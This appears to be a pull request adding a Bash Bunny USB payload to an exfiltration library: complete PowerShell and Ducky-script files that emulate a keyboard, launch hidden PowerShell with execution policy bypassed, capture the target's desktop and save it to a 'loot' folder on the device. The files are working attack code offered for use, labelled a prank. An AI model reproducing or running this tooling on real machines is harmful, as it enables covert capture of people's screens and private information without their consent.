### PR TITLE
Payload that makes screenshot with powershell

### DIFF
--- a/payloads/library/exfiltration/Auto-Screenshot/Get-ScreenShot.ps1
+++ b/payloads/library/exfiltration/Auto-Screenshot/Get-ScreenShot.ps1
@@ -1,0 +1,56 @@
+﻿$fillres = 1920, 1080
+function Get-ScreenShot
+{
+    [CmdletBinding()]
+    param(
+        [parameter(Position  = 0, Mandatory = 0, ValueFromPipelinebyPropertyName = 1)]
+        [ValidateNotNullOrEmpty()]
+        [string]$OutPath = "$env:USERPROFILE\Documents\ScreenShot",
+ 
+        #screenshot_[yyyyMMdd_HHmmss_ffff].png
+        [parameter(Position  = 1, Mandatory = 0, ValueFromPipelinebyPropertyName = 1)]
+        [ValidateNotNullOrEmpty()]
+        [string]$FileNamePattern = 'screenshot_{0}.png',
+ 
+        [parameter(Position  = 2,Mandatory = 0, ValueFromPipeline = 1, ValueFromPipelinebyPropertyName = 1)]
+        [ValidateNotNullOrEmpty()]
+        [int]$RepeatTimes = 0,
+ 
+        [parameter(Position  = 3, Mandatory = 0, ValueFromPipelinebyPropertyName = 1)]
+        [ValidateNotNullOrEmpty()]
+        [int]$DurationMs = 1
+     )
+ 
+     begin
+     {
+        $ErrorActionPreference = 'Stop'
+        Add-Type -AssemblyName System.Windows.Forms
+ 
+        if (-not (Test-Path $OutPath))
+        {
+            New-Item $OutPath -ItemType Directory -Force
+        }
+     }
+ 
+     process
+     {
+        0..$RepeatTimes `
+        | %{
+            $fileName = $FileNamePattern -f (Get-Date).ToString('yyyyMMdd_HHmmss_ffff')
+            $path = Join-Path $OutPath $fileName
+            
+            if ($fillres -eq "null") {$b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height)}
+            else {$b = New-Object System.Drawing.Bitmap($fillres)}
+
+            $g = [System.Drawing.Graphics]::FromImage($b)
+            $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size)
+            $g.Dispose()
+            $b.Save($path)
+ 
+            if ($RepeatTimes -ne 0)
+            {
+                Start-Sleep -Milliseconds $DurationMs
+            }
+        }
+    }
+}

--- a/payloads/library/exfiltration/Auto-Screenshot/payload.txt
+++ b/payloads/library/exfiltration/Auto-Screenshot/payload.txt
@@ -1,0 +1,54 @@
+#
+# Title: AutoScreenshot Windows
+# Author: Nick Rau
+# Credits to: guitarrapc for the Get-Screenshot.ps1
+# Category: Prank
+# Target: Windows
+# Attackmodes: Hid, Storage
+# Description:	This payload does uses powershell to take a screenshot of what's displayed on your desktop and
+#		saves it to the Bash Bunny. It makes use of a pre-made powershell script made by guitarrapc so
+#		credits for the Get-ScreenShot.ps1 go to him. I altered the script a bit to get around the problem
+#		with the 1920x1080 resolution. If you have part of your screen saved than you can fill in the resolution
+#		in the ... variables. EXAMPLE: 1920, 1080 or "null" if you do not want to use it.
+
+###### DISCLAMER #######
+# Do not use the keyboard when this payload runs.
+# The bunny comes up on screen when it is plugged in but it automaticly puts it
+# on the background using Ducky Script.
+
+###### OPTIONS ######
+# The options have to be set in the powershell file Get-ScreenShot.ps1.
+# The variable is called $fillres and is on top of the script.
+#
+# Fill it in like this: 				$fillres = 1920, 1080
+# Or if you do not want to fill in the resolution:	$fillres = "null"
+
+###### CONFIGURATION ######
+# 1. Put Get-ScreenShot.ps1 in the root folder of the Bash Bunny.
+# 2. Set variable "$fillres" to resolution of your choice example:1920, 1080 or "null"
+# 3. Eject Bash Bunny, set to switch you chose and plug it in.
+# 4. When the second stage begins "LED SPECIAL" it is waiting for you to set everything ready
+#    to be shot. This will be a blue blinking light When ready leave the Bash Bunny plugged in
+#    and flip switch to a different position.
+# 5. Bash Bunny takes screenshot and saves it!
+
+# SETUP - STAGE 1
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+PRIMARYSTH=$SWITCH_POSITION
+
+# ATTACK - STAGE 2
+LED SPECIAL
+GET SWITCH_POSITION
+TEST=$SWITCH_POSITION
+while true
+do GET SWITCH_POSITION
+if [ $SWITCH_POSITION != $TEST ]; then break; fi
+sleep 1
+done
+
+# EXECUTION - STAGE 3
+LED STAGE2
+RUN WIN powershell -WindowStyle Hidden -ExecutionPolicy bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$PRIMARYSTH\winload.ps1')"
+LED FINISH

--- a/payloads/library/exfiltration/Auto-Screenshot/readme.md
+++ b/payloads/library/exfiltration/Auto-Screenshot/readme.md
@@ -1,0 +1,26 @@
+# AutoScreenShot Windows for Bash Bunny
+
+* Author: Nick Rau
+* Credits to: guitarrapc for Get-ScreenShot.ps1
+* Version: 2.0
+* Target: Windows
+
+## Description
+This payload runs a powershell script that makes a screenshot and saves it to the Bash Bunny. It makes use of a powershell script made by guitarrapc
+but I altered it a bit so it makes a screenshot of the full desktop even in 1920x1080.
+
+## Configuration
+
+Put the powershell script Get-ScreenShot.ps1 in the root of the Bash Bunny's directory. In this script is a variable named $fillres.
+Thanks to a problem in powershell, the command normally used for finding the screen resolution doesn't get the right screen resolution with some screens.
+If you want to put in the resolution of your screen type: $fillres = 1920, 1080.
+If you want the script to find the resolution itself: $fillres = "null"
+
+# Status of the LED'S
+
+| LED                               | STATUS                                       |
+| --------------------------------- | -------------------------------------------- |
+| Purple                            | Setting up                                   |
+| Yellow (blinking)                 | Putting Bash Bunny on the background         |
+| Blue (blinking)                   | Running powershell                           |
+| Green                             | Attack Complete                              |

--- a/payloads/library/exfiltration/Auto-Screenshot/winload.ps1
+++ b/payloads/library/exfiltration/Auto-Screenshot/winload.ps1
@@ -1,0 +1,7 @@
+﻿$Variable=((gwmi win32_volume -f 'label=''BashBunny''').Name)
+
+Import-Module $Variable'Get-ScreenShot.ps1'
+
+New-Item -ItemType directory -Path $Variable'loot\Screenshot\'$env:COMPUTERNAME
+
+Get-ScreenShot -OutPath $Variable'loot\Screenshot\'$env:COMPUTERNAME -FileNamePattern test.png


### PR DESCRIPTION
This payload makes a screenshot of your windows desktop with powershell. Just wait for it to load and when the light turns blue/greenish, you flick the switch and the bash bunny executes a powershell script that makes a screenshot and saves it to the bash bunny. The Get-Screenshot.ps1 is a function made by guittarrpc so those credits go to him. Future change I am working on is: 1 payload for different OS's (linux, mac and windows)